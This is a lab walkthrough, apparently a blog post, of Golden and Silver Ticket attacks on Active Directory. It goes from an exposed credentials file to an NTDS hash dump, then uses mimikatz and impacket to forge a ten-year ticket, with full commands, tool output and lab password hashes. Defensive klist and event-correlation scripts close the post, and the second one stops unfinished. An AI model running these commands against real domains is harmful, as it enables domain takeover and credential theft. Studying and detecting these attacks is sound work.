In this write-up we talk about two core attacks in Active Directory: the Golden Ticket attack and the Silver Ticket attack. These techniques allow an attacker to forge Kerberos tickets and impersonate legitimate users, often without needing their passwords. The Golden Ticket attack enables full domain compromise, while a Silver Ticket attack targets a specific service. So let's dive deeper and see what these attacks do.
The Golden Ticket
As we said earlier, a Golden Ticket lets us compromise the whole domain. It's a persistence technique used in the post-compromise stage.
In Active Directory environments, Kerberos authentication relies on a trusted chain of ticket exchanges. A Golden Ticket attack exploits this trust model by allowing an attacker to forge a valid TGT using the secret key of the KRBTGT account. With the forged ticket the attacker can impersonate any user they want.
[ Attacker Machine ]
|
(1) Dump KRBTGT Hash (DA access)
|
v
+----------------------+
| Domain Controller |
| (KDC / KRBTGT key) |
+----------------------+
|
(2) Forge TGT offline using KRBTGT hash
|
v
[ Forged TGT ]
(User: Administrator, RID: 500,
Groups: Domain Admins, etc.)
|
(3) Inject ticket into memory (PTT)
|
v
[ Compromised Host ]
|
(4) Request Service Ticket (TGS)
|
v
+----------------------+
| Domain Controller |
| (validates TGT) |
+----------------------+
|
(5) KDC trusts forged TGT → issues TGS
|
v
[ Target Service ]
(SMB / MSSQL / LDAP / etc.)
|
(6) Access granted as Domain Admin
During a normal authentication, a client requests a TGT from the KDC's Authentication Service. This TGT is encrypted and signed with the KRBTGT account's NTLM hash. The client then presents this TGT to the Ticket Granting Service (TGS) to obtain service tickets for accessing resources.
The Golden Ticket attack abuses this design by forging a valid TGT using the compromised KRBTGT hash. Since the KDC uses that same key to validate incoming TGTs, any ticket encrypted with it is inherently trusted. This takes the initial authentication step (proving who you are to the KDC) out of the picture entirely.
Now we get to a lab of the attack. I made a small scenario that goes from initial access to owning the whole domain.
First we start with netexec to enumerate the shares, trying guest authentication first.
◎ nxc smb 172.0.10.13 -u 'guest' -p '' --shares
SMB 172.0.10.13 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:breakme.local) (signing:False) (SMBv1:False)
SMB 172.0.10.13 445 DC01 [+] breakme.local\guest:
SMB 172.0.10.13 445 DC01 [*] Enumerated shares
SMB 172.0.10.13 445 DC01 Share Permissions Remark
SMB 172.0.10.13 445 DC01 ----- ----------- ------
SMB 172.0.10.13 445 DC01 ADMIN$ Remote Admin
SMB 172.0.10.13 445 DC01 Backup Backup Share
SMB 172.0.10.13 445 DC01 C$ Default share
SMB 172.0.10.13 445 DC01 Finance_Reports Finance Reports
SMB 172.0.10.13 445 DC01 HR_Files HR Files
SMB 172.0.10.13 445 DC01 IPC$ READ Remote IPC
SMB 172.0.10.13 445 DC01 IT_Documents IT Department Documents
SMB 172.0.10.13 445 DC01 NETLOGON Logon server share
SMB 172.0.10.13 445 DC01 Public READ,WRITE Public Share
SMB 172.0.10.13 445 DC01 Shared READ,WRITE Shared Documents - Open Access
SMB 172.0.10.13 445 DC01 SYSVOL Logon server share
So we have read access to some shares. Let's enumerate them, starting with the Shared share.
◎ smbclient //172.0.10.13/Shared -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Mar 18 23:05:22 2026
.. D 0 Mon Jan 5 13:17:27 2026
backup_config.txt A 161 Mon Jan 5 13:17:28 2026
credentials.txt A 244 Mon Jan 5 13:17:28 2026
notes.txt A 112 Mon Jan 5 13:17:28 2026
readme.txt A 181 Mon Jan 5 13:17:28 2026
12908287 blocks of size 4096. 8123928 blocks available
smb: \> get credentials.txt
getting file \credentials.txt of size 244 as credentials.txt (79.4 KiloBytes/sec) (average 79.4 KiloBytes/sec)
smb: \> exit
So we found a credentials.txt file, let's check it.
◎ cat credentials.txt
Backup Service Account Credentials
Username: backup_admin
Password: robert
Domain: breakme.local
Note: This account has backup operator privileges.
Use for scheduled backup tasks.
WARNING: This file should be moved to a secure location!
So we got our initial access vector: a backup admin password. Now let's try to authenticate.
◎ nxc smb 172.0.10.13 -u backup_admin -p robert
SMB 172.0.10.13 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:breakme.local) (signing:False) (SMBv1:False)
SMB 172.0.10.13 445 DC01 [+] breakme.local\backup_admin:robert (Pwn3d!)
So we are authenticated, and we also see (Pwn3d!), meaning we are a local admin on this machine. Let's now dump the ntds.dit database and get all the hashes.
◎ nxc smb 172.0.10.13 -u backup_admin -p robert --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n]
SMB 172.0.10.13 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:breakme.local) (signing:False) (SMBv1:False)
SMB 172.0.10.13 445 DC01 [+] breakme.local\backup_admin:robert (Pwn3d!)
SMB 172.0.10.13 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 172.0.10.13 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:a94e5c55d3b65705496781e68001cca1:::
SMB 172.0.10.13 445 DC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 172.0.10.13 445 DC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:269cac996a1a21aaac5c04f99aa47fd9:::
SMB 172.0.10.13 445 DC01 breakme.local\jsmith:1114:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB 172.0.10.13 445 DC01 breakme.local\sjohnson:1115:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
SMB 172.0.10.13 445 DC01 breakme.local\mwilliams:1116:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
SMB 172.0.10.13 445 DC01 breakme.local\ebrown:1117:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
SMB 172.0.10.13 445 DC01 breakme.local\djones:1118:aad3b435b51404eeaad3b435b51404ee:9a0198b452271b12ed7bfa3857896de6:::
SMB 172.0.10.13 445 DC01 breakme.local\jgarcia:1119:aad3b435b51404eeaad3b435b51404ee:4ddec0a4c1b022c5fd8503826fbfb7f2:::
SMB 172.0.10.13 445 DC01 breakme.local\rmiller:1120:aad3b435b51404eeaad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d:::
SMB 172.0.10.13 445 DC01 breakme.local\adavis:1121:aad3b435b51404eeaad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
SMB 172.0.10.13 445 DC01 breakme.local\crodriguez:1122:aad3b435b51404eeaad3b435b51404ee:dcd25a439cd39daa6baeb6c02e88a9e6:::
SMB 172.0.10.13 445 DC01 breakme.local\mmartinez:1123:aad3b435b51404eeaad3b435b51404ee:f773c5db7ddebefa4b0dae7ee8c50aea:::
SMB 172.0.10.13 445 DC01 breakme.local\dhernandez:1124:aad3b435b51404eeaad3b435b51404ee:f7eb9c06fafaa23c4bcf22ba6781c1e2:::
SMB 172.0.10.13 445 DC01 breakme.local\llopez:1125:aad3b435b51404eeaad3b435b51404ee:320a78179516c385e35a93ffa0b1c4ac:::
SMB 172.0.10.13 445 DC01 breakme.local\jwilson:1126:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
SMB 172.0.10.13 445 DC01 breakme.local\panderson:1127:aad3b435b51404eeaad3b435b51404ee:6d3986e540a63647454a50e26477ef94:::
SMB 172.0.10.13 445 DC01 breakme.local\mthomas:1128:aad3b435b51404eeaad3b435b51404ee:31c72c210ecc03d1eae94fa496069448:::
SMB 172.0.10.13 445 DC01 breakme.local\john:1129:aad3b435b51404eeaad3b435b51404ee:c27975d3a5b9e95acd37ec1b1b7598b8:::
SMB 172.0.10.13 445 DC01 breakme.local\jane:1130:aad3b435b51404eeaad3b435b51404ee:97b592737f87a48fe07e59db8659d166:::
SMB 172.0.10.13 445 DC01 breakme.local\bwilliams:1131:aad3b435b51404eeaad3b435b51404ee:fb4bf3ddf37cf6494a9905541290cf51:::
SMB 172.0.10.13 445 DC01 breakme.local\asmith:1132:aad3b435b51404eeaad3b435b51404ee:bb53a477af18526ada697ce2e51f76b3:::
SMB 172.0.10.13 445 DC01 breakme.local\user:1133:aad3b435b51404eeaad3b435b51404ee:579110c49145015c47ecd267657d3174:::
SMB 172.0.10.13 445 DC01 breakme.local\johnsmith:1134:aad3b435b51404eeaad3b435b51404ee:4057b60b514c5402dde3d29a1845c366:::
SMB 172.0.10.13 445 DC01 breakme.local\sarahjohnson:1135:aad3b435b51404eeaad3b435b51404ee:72f5cfa80f07819ccbcfb72feb9eb9b7:::
SMB 172.0.10.13 445 DC01 breakme.local\michaelbrown:1136:aad3b435b51404eeaad3b435b51404ee:152efbcfafeb22eabda8fc5e68697a41:::
SMB 172.0.10.13 445 DC01 breakme.local\kwhite:1137:aad3b435b51404eeaad3b435b51404ee:dd555241a4321657e8b827a40b67dd4a:::
SMB 172.0.10.13 445 DC01 breakme.local\nharris:1138:aad3b435b51404eeaad3b435b51404ee:b7e0ea9fbffcf6dd83086e905089effd:::
SMB 172.0.10.13 445 DC01 breakme.local\rclark:1139:aad3b435b51404eeaad3b435b51404ee:8d4ef8654a9adc66d4f628e94f66e31b:::
SMB 172.0.10.13 445 DC01 breakme.local\slewis:1140:aad3b435b51404eeaad3b435b51404ee:2bdcad6d2082323222a291328ab4883e:::
SMB 172.0.10.13 445 DC01 breakme.local\lwalker:1141:aad3b435b51404eeaad3b435b51404ee:58def5844fe58e8f26a65fff9deb3827:::
SMB 172.0.10.13 445 DC01 breakme.local\mhall:1142:aad3b435b51404eeaad3b435b51404ee:bf4c3092a586df1a9137a4f5737bdc94:::
SMB 172.0.10.13 445 DC01 breakme.local\jallen:1143:aad3b435b51404eeaad3b435b51404ee:5eee54ce19b97c11fd02e531dd268b4c:::
SMB 172.0.10.13 445 DC01 breakme.local\eyoung:1144:aad3b435b51404eeaad3b435b51404ee:b7265f8cc4f00b58f413076ead262720:::
SMB 172.0.10.13 445 DC01 breakme.local\nking:1145:aad3b435b51404eeaad3b435b51404ee:2d0bc7fe9cd9293cdc87b2162a52a4a0:::
SMB 172.0.10.13 445 DC01 breakme.local\swright:1146:aad3b435b51404eeaad3b435b51404ee:6241f038703cbfb7cc837e3ee04f0f6b:::
SMB 172.0.10.13 445 DC01 breakme.local\tlopez:1147:aad3b435b51404eeaad3b435b51404ee:39b8620e745b8aa4d1108e22f74f29e2:::
SMB 172.0.10.13 445 DC01 breakme.local\khill:1148:aad3b435b51404eeaad3b435b51404ee:c52abb1e14677d7ea228fcc1171ed7b7:::
SMB 172.0.10.13 445 DC01 breakme.local\nscott:1149:aad3b435b51404eeaad3b435b51404ee:ec2c9f3346af1fb8e4ee94f286bac5ad:::
SMB 172.0.10.13 445 DC01 breakme.local\bgreen:1150:aad3b435b51404eeaad3b435b51404ee:85ac333bbfcbaa62ba9f8afb76f06268:::
SMB 172.0.10.13 445 DC01 breakme.local\hadams:1151:aad3b435b51404eeaad3b435b51404ee:c7f9949b02c66ac8f73196675a07bf7c:::
SMB 172.0.10.13 445 DC01 breakme.local\sbaker:1152:aad3b435b51404eeaad3b435b51404ee:d8d34b3cff03786fbe1d80b2c8c09d9e:::
SMB 172.0.10.13 445 DC01 breakme.local\dnelson:1153:aad3b435b51404eeaad3b435b51404ee:0ab71493101c2e080fbcf1961e518513:::
SMB 172.0.10.13 445 DC01 breakme.local\ccarter:1154:aad3b435b51404eeaad3b435b51404ee:75585b269146e4ce4828a89e54bc6b0d:::
SMB 172.0.10.13 445 DC01 breakme.local\rmitchell:1155:aad3b435b51404eeaad3b435b51404ee:5590aeecbc91d32a4566ab8b0799ca04:::
SMB 172.0.10.13 445 DC01 breakme.local\sperez:1156:aad3b435b51404eeaad3b435b51404ee:e58849315e4c3a7a9a4af80ae33c59d1:::
SMB 172.0.10.13 445 DC01 breakme.local\mroberts:1157:aad3b435b51404eeaad3b435b51404ee:95a607aba41d7dc1f32ffdbc5c122191:::
SMB 172.0.10.13 445 DC01 breakme.local\eturner:1158:aad3b435b51404eeaad3b435b51404ee:92b7b06bb313bf666640c5a1e75e0c18:::
SMB 172.0.10.13 445 DC01 breakme.local\kphillips:1159:aad3b435b51404eeaad3b435b51404ee:8d44c8ff3a4d1979b24bfe29257173ad:::
SMB 172.0.10.13 445 DC01 breakme.local\backup_admin:1160:aad3b435b51404eeaad3b435b51404ee:12136c7dd697dd0dfbc33ae2e5795d93:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_backup:1161:aad3b435b51404eeaad3b435b51404ee:674e48b68c5cd0efd8f7e5faa87b3d1e:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_sql:1162:aad3b435b51404eeaad3b435b51404ee:31fc0dc8f7dfad0e8bd7ccc3842f2ce9:::
SMB 172.0.10.13 445 DC01 breakme.local\admin_legacy:1163:aad3b435b51404eeaad3b435b51404ee:5d05e3883afc84f1842f8b1c6d895fa4:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_http:1164:aad3b435b51404eeaad3b435b51404ee:ec1925c6d3d4206891f83b8ff1a9eabc:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_mssql:1165:aad3b435b51404eeaad3b435b51404ee:74ed32086b1317b742c3a92148df1019:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_exchange:1166:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_iis:1167:aad3b435b51404eeaad3b435b51404ee:8d44c8ff3a4d1979b24bfe29257173ad:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_delegation:1168:aad3b435b51404eeaad3b435b51404ee:adfd113f9a55239f0c74ee6dc7798623:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_constrained:1169:aad3b435b51404eeaad3b435b51404ee:dc944d1193bc233287b3b3ba66f08116:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_rbcd:1170:aad3b435b51404eeaad3b435b51404ee:5319b3346226e70bbe08376691807c83:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_replication:1171:aad3b435b51404eeaad3b435b51404ee:2d0bc7fe9cd9293cdc87b2162a52a4a0:::
SMB 172.0.10.13 445 DC01 breakme.local\svc_nopass:1172:aad3b435b51404eeaad3b435b51404ee:eac03cc37b34a79bc884dfeef01bc4a3:::
SMB 172.0.10.13 445 DC01 breakme.local\guest_nopass:1173:aad3b435b51404eeaad3b435b51404ee:eac03cc37b34a79bc884dfeef01bc4a3:::
SMB 172.0.10.13 445 DC01 breakme.local\sanji:1175:aad3b435b51404eeaad3b435b51404ee:68ae965c9062b389f2a285e27ff0a566:::
SMB 172.0.10.13 445 DC01 DC01$:1000:aad3b435b51404eeaad3b435b51404ee:3efdb28e46e699705d0207aa2fec28ad:::
SMB 172.0.10.13 445 DC01 WS01$:1174:aad3b435b51404eeaad3b435b51404ee:4bfb438db8d8543981ab7466cf954f41:::
SMB 172.0.10.13 445 DC01 [+] Dumped 66 NTDS hashes to /home/kali/.nxc/logs/ntds/DC01_172.0.10.13_2026-03-18_231113.ntds of which 64 were added to the database
SMB 172.0.10.13 445 DC01 [*] To extract only enabled accounts from the output file, run the following command:
SMB 172.0.10.13 445 DC01 [*] cat /home/kali/.nxc/logs/ntds/DC01_172.0.10.13_2026-03-18_231113.ntds | grep -iv disabled | cut -d ':' -f1
SMB 172.0.10.13 445 DC01 [*] grep -iv disabled /home/kali/.nxc/logs/ntds/DC01_172.0.10.13_2026-03-18_231113.ntds | cut -d ':' -f1
So we got all the hashes. Now we basically own the domain. But we need persistence.
The first thing we want is the hash of the krbtgt account.
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:269cac996a1a21aaac5c04f99aa47fd9:::
We only want the NT hash part (the last field). Now let's psexec to the machine with the Administrator's hash.
◎ impacket-psexec breakme.local/administrator@172.0.10.13 -hashes :a94e5c55d3b65705496781e68001cca1
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 172.0.10.13.....
[*] Found writable share ADMIN$
[*] Uploading file lwrnIUXH.exe
[*] Opening SVCManager on 172.0.10.13.....
[*] Creating service SdHx on 172.0.10.13.....
[*] Starting service SdHx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.26100.1742]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32> whoami
nt authority\system
C:\Windows\System32>
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 960B-96BA
Directory of C:\Users\Administrator\Desktop
18-03-2026 05:46 <DIR> .
18-03-2026 03:43 <DIR> ..
27-02-2026 02:36 1,355,264 mimikatz.exe
27-02-2026 02:36 446,976 Rubeus.exe
2 File(s) 2,023,106 bytes
2 Dir(s) 33,284,661,248 bytes free
C:\Users\Administrator\Desktop>
Next we have to find the Domain SID. For that we can use the Get-ADDomain command.
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADdomain
AllowedDNSSuffixes : {}
ChildDomains : {}
ComputersContainer : CN=Computers,DC=breakme,DC=local
DeletedObjectsContainer : CN=Deleted Objects,DC=breakme,DC=local
DistinguishedName : DC=breakme,DC=local
DNSRoot : breakme.local
DomainControllersContainer : OU=Domain Controllers,DC=breakme,DC=local
DomainMode : Windows2025Domain
DomainSID : S-1-5-21-3878086263-1604080912-3480837854
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=breakme,DC=local
Forest : breakme.local
InfrastructureMaster : DC01.breakme.local
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {cn={B3FC19C0-88B7-4CB7-8DBC-D8C4A3660C63},cn=policies,cn=system,DC=breakme,DC=local, cn={D820C191-D05F-4A32-9FAF-32BE5D7E5DBE},cn=policies,cn=system,DC=breakme,DC=local,
cn={30529373-4640-4DCE-8760-CFB1663563E7},cn=policies,cn=system,DC=breakme,DC=local, CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=breakme,DC=local}
LostAndFoundContainer : CN=LostAndFound,DC=breakme,DC=local
ManagedBy :
Name : breakme
NetBIOSName : BREAKME
ObjectClass : domainDNS
ObjectGUID : f6f768ea-8001-4346-857f-2d1d3ed55331
ParentDomain :
PDCEmulator : DC01.breakme.local
PublicKeyRequiredPasswordRolling : True
QuotasContainer : CN=NTDS Quotas,DC=breakme,DC=local
ReadOnlyReplicaDirectoryServers : {}
ReplicaDirectoryServers : {DC01.breakme.local}
RIDMaster : DC01.breakme.local
SubordinateReferences : {DC=ForestDnsZones,DC=breakme,DC=local, DC=DomainDnsZones,DC=breakme,DC=local, CN=Configuration,DC=breakme,DC=local}
SystemsContainer : CN=System,DC=breakme,DC=local
UsersContainer : CN=Users,DC=breakme,DC=local
*Evil-WinRM* PS C:\Users\Administrator\Documents>
I have already uploaded a copy of mimikatz to the machine. Now we can use mimikatz to start the attack. The commands for the Golden Ticket attack are the following.
# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ptt
# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:randomuser /ptt
# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:randomuser /ptt
We got the NT hash, so let's go with that.
C:\Users\Administrator\Desktop> .\mimikatz
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
kerberos::golden /domain:breakme.local /sid:S-1-5-21-3878086263-1604080912-3480837854 /rc4:269cac996a1a21aaac5c04f99aa47fd9 /user:Administrator /ptt
mimikatz # User : Administrator
Domain : breakme.local (BREAKME)
SID : S-1-5-21-3878086263-1604080912-3480837854
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 269cac996a1a21aaac5c04f99aa47fd9 - rc4_hmac_nt
Lifetime : 18-03-2026 08:18:45 ; 15-03-2036 08:18:45 ; 15-03-2036 08:18:45
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ breakme.local' successfully submitted for current session
We can see that the ticket is injected into the current session. We can verify that with klist.
C:\Users\Administrator\Desktop> klist
Current LogonId is 0:0x3e7
Cached Tickets: (1)
#0> Client: Administrator @ breakme.local
Server: krbtgt/breakme.local @ breakme.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 3/18/2026 8:18:45 (local)
End Time: 3/15/2036 8:18:45 (local)
Renew Time: 3/15/2036 8:18:45 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
We can also see a cool thing: the ticket expiry. It's actually 10 years.
For persistence we can save that ticket to a file and then use it later. For that we can use the following command.
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ticket:golden.kirbi
C:\Users\Administrator\Desktop> .\mimikatz
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
kerberos::golden /domain:breakme.local /sid:S-1-5-21-3878086263-1604080912-3480837854 /rc4:269cac996a1a21aaac5c04f99aa47fd9 /user:Administrator /ticket:golden.kirbi
mimikatz # User : Administrator
Domain : breakme.local (BREAKME)
SID : S-1-5-21-3878086263-1604080912-3480837854
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 269cac996a1a21aaac5c04f99aa47fd9 - rc4_hmac_nt
Lifetime : 18-03-2026 08:22:22 ; 15-03-2036 08:22:22 ; 15-03-2036 08:22:22
-> Ticket : golden.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 960B-96BA
Directory of C:\Users\Administrator\Desktop
18-03-2026 05:46 <DIR> .
18-03-2026 03:43 <DIR> ..
18-03-2026 08:22 1,403 golden.kirbi
27-02-2026 02:36 1,355,264 mimikatz.exe
27-02-2026 02:36 446,976 Rubeus.exe
04-01-2026 22:02 219,463 Setup-VulnerableAD.ps1
4 File(s) 2,023,106 bytes
2 Dir(s) 33,283,723,264 bytes free
Now we can perform this attack from Linux.
We can use the impacket-ticketer script for this. We use the following commands.
# Create the golden ticket (with an RC4 key, i.e. NT hash)
ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" "randomuser"
# Create the golden ticket (with an AES 128/256bits key)
ticketer.py -aesKey "$krbtgtAESkey" -domain-sid "$domainSID" -domain "$DOMAIN" "randomuser"
We can look up the Domain SID with lookupsid.py:
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
◎ impacket-lookupsid -hashes :a94e5c55d3b65705496781e68001cca1 'breakme.local\Administrator@breakme.local' 0
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at breakme.local
[*] StringBinding ncacn_np:breakme.local[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3878086263-1604080912-3480837854
Now let's do the attack.
◎ impacket-ticketer -nthash "269cac996a1a21aaac5c04f99aa47fd9" -domain-sid "S-1-5-21-3878086263-1604080912-3480837854" -domain "breakme.local" "Administrator"
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breakme.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
So we got a ccache file. Now we can use Kerberos authentication for whatever we want to do next.
┌──(kali㉿kali)-[~/Desktop/breakme.local]
└─$ export KRB5CCNAME=Administrator.ccache
┌──(kali㉿kali)-[~/Desktop/breakme.local]
└─$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@BREAKME.LOCAL
Valid starting Expires Service principal
03/18/2026 23:33:57 03/15/2036 23:33:57 krbtgt/BREAKME.LOCAL@BREAKME.LOCAL
renew until 03/15/2036 23:33:57
We can see the ticket is valid for the next 10 years.
So this is how the Golden Ticket attack is done. Now let's move on to the Silver Ticket attack.
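The two klist listings above (the Windows one after the mimikatz injection and the MIT one for the ccache) both expose the same tell: a ticket that lives for ten years in a domain whose policy caps tickets at hours. As an added example that is not part of the original write-up, here is a small Python triage script that parses either klist format and flags tickets whose lifetime exceeds the policy maximum. The sample outputs are constructed, modelled on the listings above, and the 10-hour limit is an assumed Default Domain Policy value.

```python
import re
from datetime import datetime, timedelta

# Assumed policy value: the Default Domain Policy caps a TGT at 10 hours (and a service
# ticket at 600 minutes). A cached ticket that lasts for years cannot have been issued by
# a KDC honouring that policy, whatever else looks normal about it.
MAX_TICKET_LIFETIME = timedelta(hours=10)

# Windows klist: "Server: krbtgt/breakme.local @ breakme.local", "Start Time: 3/18/2026 8:18:45 (local)"
WIN_SERVER = re.compile(r"^\s*Server:\s+(.+?)\s*$")
WIN_TIME = re.compile(r"^\s*(Start|End) Time:\s+(\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2})")
# MIT klist: "03/18/2026 23:33:57  03/15/2036 23:33:57  krbtgt/BREAKME.LOCAL@BREAKME.LOCAL"
MIT_ROW = re.compile(
    r"^\s*(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\s+(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\s+(\S+)")

# Constructed sample output, modelled on the write-up's listings (not captured from a real host).
WINDOWS_KLIST = """\
Current LogonId is 0:0x3e7
Cached Tickets: (2)
#0>     Client: Administrator @ breakme.local
        Server: krbtgt/breakme.local @ breakme.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 3/18/2026 8:18:45 (local)
        End Time:   3/15/2036 8:18:45 (local)
        Renew Time: 3/15/2036 8:18:45 (local)
#1>     Client: jsmith @ breakme.local
        Server: cifs/dc01.breakme.local @ breakme.local
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 3/18/2026 8:00:00 (local)
        End Time:   3/18/2026 18:00:00 (local)
        Renew Time: 3/25/2026 8:00:00 (local)
"""
MIT_KLIST = """\
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@BREAKME.LOCAL

Valid starting       Expires              Service principal
03/18/2026 23:33:57  03/15/2036 23:33:57  krbtgt/BREAKME.LOCAL@BREAKME.LOCAL
\trenew until 03/15/2036 23:33:57
"""


def _ts(text):
    """Both klist flavours print month/day/year; Windows omits zero padding, strptime accepts that."""
    return datetime.strptime(text, "%m/%d/%Y %H:%M:%S")


def parse_klist(output):
    """Parse Windows or MIT klist output into [{'service', 'start', 'end'}, ...]."""
    tickets, current = [], None
    for line in output.splitlines():
        if m := MIT_ROW.match(line):
            tickets.append({"service": m.group(3), "start": _ts(m.group(1)), "end": _ts(m.group(2))})
        elif m := WIN_SERVER.match(line):
            current = {"service": m.group(1), "start": None, "end": None}
            tickets.append(current)
        elif (m := WIN_TIME.match(line)) and current is not None:
            current[m.group(1).lower()] = _ts(m.group(2))
    return [t for t in tickets if t["start"] and t["end"]]


def suspicious_tickets(output, max_lifetime=MAX_TICKET_LIFETIME):
    """Return (service, lifetime) for every cached ticket that outlives the policy maximum."""
    return [(t["service"], t["end"] - t["start"])
            for t in parse_klist(output) if t["end"] - t["start"] > max_lifetime]


if __name__ == "__main__":
    for label, output in (("windows", WINDOWS_KLIST), ("mit", MIT_KLIST)):
        for service, lifetime in suspicious_tickets(output):
            print(f"[{label}] {service}: lifetime {lifetime.days} days exceeds policy")
```

The check is deliberately cheap so it can run over klist output collected from many hosts; it catches tickets forged with the default lifetime shown above, not ones forged with a policy-conformant lifetime, so treat it as one indicator alongside the KDC-side correlation.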
The Silver Ticket
So the Silver Ticket is a Kerberos exploitation technique that involves forging a valid Ticket Granting Service (TGS) ticket for a specific service rather than a Ticket Granting Ticket (TGT).
In a normal Kerberos flow, a client presents a valid TGT to the KDC to request a service ticket, which is then used to authenticate to a specific service such as SMB, MSSQL, HTTP, etc. A Silver Ticket attack exploits this by allowing an attacker to forge a TGS offline using the service account's hash. With a Silver Ticket we can impersonate any user we want to access that specific service.
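Both the forged TGT from the first half of this write-up and the forged TGS described here leave a gap in the KDC's own records: a Golden Ticket produces service ticket requests (event 4769) with no matching TGT request (4768) for that client, and a Silver Ticket produces a Kerberos logon (4624) on the member server with no 4769 naming that server at any DC. The following Python script, added here as an example and not part of the original write-up, runs that correlation over constructed sample events (simplified dictionaries standing in for the Security log fields; the 10-hour window is an assumed policy value) and also flags RC4-encrypted tickets, since the forged tickets in this lab use rc4_hmac_nt.

```python
from datetime import datetime, timedelta

# Assumed policy value (Default Domain Policy caps a TGT at 10 hours). A real 4769 must be
# preceded by a 4768 for the same account and client inside this window, and a real Kerberos
# logon on a member server must be preceded by a 4769 naming that server at some DC.
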